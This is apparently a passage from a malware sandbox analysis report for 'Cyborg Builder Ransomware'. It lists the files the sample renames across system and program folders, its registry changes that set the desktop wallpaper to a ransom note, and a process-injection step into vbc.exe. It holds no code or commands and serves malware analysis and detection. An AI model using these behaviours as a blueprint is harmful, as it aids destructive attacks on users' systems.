| File created | C:\Windows\SysWOW64\KBDMAC.DLL.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\tracerpt.exe.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ComDTC-merged-Package~31bf3856ad364e35~amd64~~10.0.22000.434.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StepsRecorder-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\microsoft_bluetooth_hfp_ag.inf_amd64_84a210036c6c1bdf.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\getevent.types.ps1xml.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\dot3cfg.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\deviceaccess.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Package-UNP-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\sxproxy.dll.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\KBDGRLND.DLL.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\spbcd.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OneDrive-Setup-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmrock5.inf_amd64_d7e3f61b70de13bc.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\mfc120u.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\ustprov.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-KernelInt-VirtualDevice-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\DriverStore\en-US\c_legacydriver.inf_loc.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\BOOTVID.DLL.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\mscories.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\tracerpt.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Dism\en-US\TransmogProvider.dll.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\Speech\Engines\SR.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\mfaudiocnv.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Connectivity-Serial-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Casting-Platform-Package~31bf3856ad364e35~amd64~~10.0.22000.100.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\rtux64w10.inf_amd64_a39ece60dbc76c55\rtux64w10.sys.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\setx.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\Windows.StateRepositoryCore.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\Configuration\Schema\MSFT_FileDirectoryConfiguration\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSecurity\en\Microsoft.Windows.Firewall.Commands.Resources.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Guest-Vpci-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Networking-Containers-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\SystemSupportInfo.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\msiexec.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\printui.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\ws2help.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\mssip32.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wbem\Remove.Microsoft.AppV.AppvClientWmi.mof.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\kanji_1.uce.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DxpTaskSync.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\INETRES.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\SystemPropertiesPerformance.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\xwtpdui.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\osbaseln.dll.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wbem\mispace.mof.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\MsDtc\MSFT_DtcLogTask_v1.0.cdxml.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EudcEdit-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\NetworkList.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\hidphone.tsp.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\ir41_32.ax.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\Windows.AccountsControl.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ServiceResource\en-US\MSFT_ServiceResource.schema.mfl.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\XpsToPclmConverter.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-IoTEnterprise-License-Package~31bf3856ad364e35~amd64~~10.0.22000.120.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\DriverStore\en-US\SCRAWPDO.inf_loc.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wbem\en-US\netswitchteamcim.dll.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\Windows.ApplicationModel.Store.Preview.DOSettings.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22000.348.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Windows.System.UserProfile.DiagnosticsSettings.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\IME\SHARED\ImeBrokerps.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\000.bmp" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpCB5E.bmp" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1492 set thread context of 6464 | N/A | C:\Users\Admin\Desktop\7.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
| PID 1492 set thread context of 5872 | N/A | C:\Users\Admin\Desktop\7.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-phn.xrm-ms.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-commonjs\types\ISemanticTextColors.js.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_contrast-black.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-ppd.xrm-ms.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\ga.pak.DATA.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\legal\jdk\santuario.md.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ONNXRuntime-0.5.X.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\SnipSketchAppList.targetsize-40_altform-unplated.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-white\CameraAppList.targetsize-72_altform-unplated.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\PREVIEW.GIF.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Xbox_AppList.scale-125_contrast-black.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-125_contrast-black.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\sr-Latn-RS.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-60.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\BeLikeExactly.Tests.ps1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ppd.xrm-ms.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\components\DocumentCard\DocumentCardTitle.types.js.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-256.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib-commonjs\IRawStyleBase.js.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\NewsAppList.targetsize-32.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\System.Net.WebSockets.Client.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-64_altform-lightunplated.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib\IKeyframes.js.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2XML.XSL.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_neutral_~_8wekyb3d8bbwe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-400.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlMiddleCircleHover.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\ui-strings.js.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\pwahelper.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\bin\prism_d3d.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\bin\javap.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\http\view.html.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Light.scale-200.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ul-phn.xrm-ms.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\msedgeupdateres_uk.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-30_altform-unplated.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\PesterThrow.ps1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.targetsize-36_altform-unplated.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\it\System.Windows.Forms.resources.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-180.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\XLSTART.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-400.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\legal\jdk.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\ink\mshwLatin.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-audio-callcontrol_31bf3856ad364e35_10.0.22000.376_none_30ba6bbc91270e3c\f\CallButtons.ProxyStub.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~zh-TW~10.0.22000.493.mum.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..terprises.resources_31bf3856ad364e35_10.0.22000.493_el-gr_bbb98f1767db1d63.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-security-credssp_31bf3856ad364e35_10.0.22000.318_none_bf30385626ae2dae\credssp.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\r\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\cs-CZ.json.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-i..l-keyboard-00000404_31bf3856ad364e35_10.0.22000.1_none_3eda577b6825da8f.manifest.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-ngc-popkeysrv_31bf3856ad364e35_10.0.22000.282_none_cc435a260c3d2b52\f\ngcpopkeysrv.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-smbserver-v2_31bf3856ad364e35_10.0.22000.348_none_d54430917bb23076\f.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_b563dd17654ea05f\cmstplua.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\msil_microsoft.windows.a...commands.resources_31bf3856ad364e35_10.0.22000.348_it-it_0b886f0e11c5ce37.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\Packages\Microsoft-Windows-DirectoryServices-ADAM-Snapins-Admin-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
